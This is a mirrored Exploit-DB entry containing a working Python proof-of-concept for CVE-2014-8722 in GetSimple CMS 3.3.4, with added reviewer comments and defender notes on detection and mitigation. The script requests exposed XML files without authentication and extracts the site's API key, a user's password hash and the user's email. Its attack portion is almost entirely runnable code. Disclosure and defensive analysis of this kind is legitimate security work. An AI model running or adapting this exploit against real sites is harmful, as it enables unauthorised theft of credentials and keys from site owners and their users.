GetSimple CMS 3.3.4 – Information Disclosure

  • 作者: Ron Jost
    日期: 2021-06-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49928/
    # Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure
    # Date 01.06.2021
    # Exploit Author: Ron Jost (Hacker5preme)
    # Vendor Homepage: http://get-simple.info/
    # Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS/archive/refs/tags/v3.3.4.zip
    # Version: 3.3.4
    # CVE: CVE-2014-8722
    # Documentation: https://github.com/Hacker5preme/Exploits#CVE-2014-8722-Exploit
    #
    # NOTE(review): this is a flat PoC script, not a library. It issues two
    # unauthenticated HTTP GETs against static XML files under the CMS web
    # root (data/other/authorization.xml and data/users/<name>.xml) and
    # prints whatever it slices out of the response bodies. There is no
    # status-code or timeout handling anywhere below.
    #
    # Defender notes: the observable signal is plain GET requests for
    # /data/other/authorization.xml, /data/users/*.xml and the other paths
    # listed in the description below, arriving from clients that never
    # authenticated. The root cause is that these files are directly
    # servable; mitigation is denying direct HTTP access to the data/ and
    # backups/ directories at the web server and moving to a release where
    # CVE-2014-8722 is fixed.
    
    
    '''
    Description:
    GetSimple CMS 3.3.4 allows remote attackers to obtain sensitive information via a direct request to
    (1) data/users/<username>.xml,
    (2) backups/users/<username>.xml.bak,
    (3) data/other/authorization.xml, or
    (4) data/other/appid.xml.
    '''
    
    
    '''
    Import required modules:
    '''
    import sys
    import requests
    
    '''
    User-Input:
    '''
    # Positional arguments: host, port, and the CMS base path. No validation
    # is done; a missing argument raises IndexError. cmspath is concatenated
    # directly after the port (see the URL builds below), so it must either
    # be empty or start with '/'.
    target_ip: str = sys.argv[1]
    target_port: str = sys.argv[2]
    cmspath: str = sys.argv[3]
    print('')
    # `username` is first the raw prompt answer and is then rebound to a
    # bool below; `username_string` holds the actual name when given.
    username = input("Do you know the username? Y/N: ")
    # Only an exact uppercase 'Y' selects the per-user lookup; any other
    # answer (including lowercase 'y') falls through to the else branch.
    if username == 'Y':
        print('')
        username = True
        username_string = input('Please enter the username: ')
    else:
        print('')
        username = False
        print('No problem, you will still get the API key')
    
    
    '''
    Get Api-Key:
    '''
    # Plain-HTTP URL assembled by string concatenation; no scheme option.
    url = 'http://' + target_ip + ':' + target_port + cmspath + '/data/other/authorization.xml'
    # Browser-like request headers. Nothing below depends on them; they
    # presumably only make the request resemble ordinary browser traffic.
    header = {
    "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
    "Accept-Encoding": "gzip, deflate",
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
    "Cache-Control": "max-age=0"
    }
    # Response body is used as-is: the HTTP status is never checked, so a
    # 403/404 error page is sliced just like a real XML document.
    x = requests.get(url, headers=header).text
    # Slices the text between the first '[' (plus seven characters) and the
    # first ']'. The +7 presumably skips a "[CDATA[" marker so that the key
    # inside a CDATA section is isolated — assumption from the offsets, not
    # confirmed here. If the markers are absent, find() returns -1 and the
    # slice is garbage or empty.
    start = x.find('[') + 7
    end = x.find(']')
    api_key: str = x[start:end]
    print('')
    print('Informations:')
    print('')
    print('[*] API Key: ' + api_key)
    
    
    if username:
        '''
        Get Email and Passwordhash:
        '''
        # Per-user XML file; the supplied username is inserted into the path
        # without any encoding or sanitisation.
        url = "http://" + target_ip + ':' + target_port + cmspath + '/data/users/' + username_string + '.xml'
        # Same cosmetic header set as above.
        header = {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
        "Cache-Control": "max-age=0"
        }
        # Again no status check: an error page yields empty/garbage fields.
        x = requests.get(url, headers=header).text
        # Element text is extracted with find(): cut the body at the first
        # occurrence of 'PWD>', then take what lies between the next '>' and
        # the following '<'. Real XML parsing would be safer, but this PoC
        # relies on the file's fixed layout.
        start =x[x.find('PWD>'):]
        passwordhash: str = start[start.find('>') +1 :start.find('<')]
        print('[*] Hashed Password: ' + passwordhash)
    
        # Same slicing approach for the EMAIL element.
        start = x[x.find('EMAIL>'):]
        email: str = start[start.find('>') + 1 : start.find('<')]
        print('[*] Email: ' + email)
        print('')